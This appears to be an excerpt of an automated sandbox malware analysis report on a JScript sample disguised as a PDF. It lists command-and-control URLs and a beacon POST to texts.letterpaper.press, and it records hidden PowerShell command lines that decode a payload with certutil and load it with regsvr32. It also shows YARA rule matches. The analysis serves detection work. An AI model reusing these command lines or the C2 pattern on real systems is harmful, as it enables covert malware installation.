        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db;M
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190d~
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190e
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f-1
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190fb
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190g
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190gM
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190h
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iC&
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iM
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190l
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lN/
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lO)
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190m
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190mC
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190n
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190o
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p(1
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69
        Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F
        Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190pLk
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190q
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190qB
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190r
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190s
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190t
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190u
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uB
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uC
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uN&
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v~
        Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190wP
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190x
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190xt
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190y
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190yC6
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190z
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190~N
        Source: unknownHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: texts.letterpaper.press
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA7940 InternetOpenW,InternetConnectW,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983DA7940
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D99FE0 GetDesktopWindow,GetDC,CreateCompatibleDC,LoadLibraryA,GetProcAddress,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,GetDIBits,WriteFile,CloseHandle,SelectObject,DeleteObject,DeleteDC,ReleaseDC,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983D99FE0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D989D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,13_2_00007FF983D989D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3028 CryptImportKey,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,13_2_00007FF983DE3028
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D98D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,13_2_00007FF983D98D10
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D089D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,19_2_00007FF983D089D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53028 CryptImportKey,19_2_00007FF983D53028
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D08D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,19_2_00007FF983D08D10

        System Summary:

        barindex
        Wscript starts Powershell (via cmd or directly)Show sources
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse, type: SAMPLEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: Process Memory Space: wscript.exe PID: 7044, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
        Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
        Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
        Source: Process Memory Space: regsvr32.exe PID: 2052, type: MEMORYSTRMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPEDMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPEDMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB72C013_2_00007FF983DB72C0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB79B013_2_00007FF983DB79B0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB7EB013_2_00007FF983DB7EB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA84D013_2_00007FF983DA84D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9832013_2_00007FF983D98320
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD82F013_2_00007FF983DD82F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD22A413_2_00007FF983DD22A4
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DC626013_2_00007FF983DC6260
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB116013_2_00007FF983DB1160
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD111013_2_00007FF983DD1110
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9A86013_2_00007FF983D9A860
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DC676C13_2_00007FF983DC676C
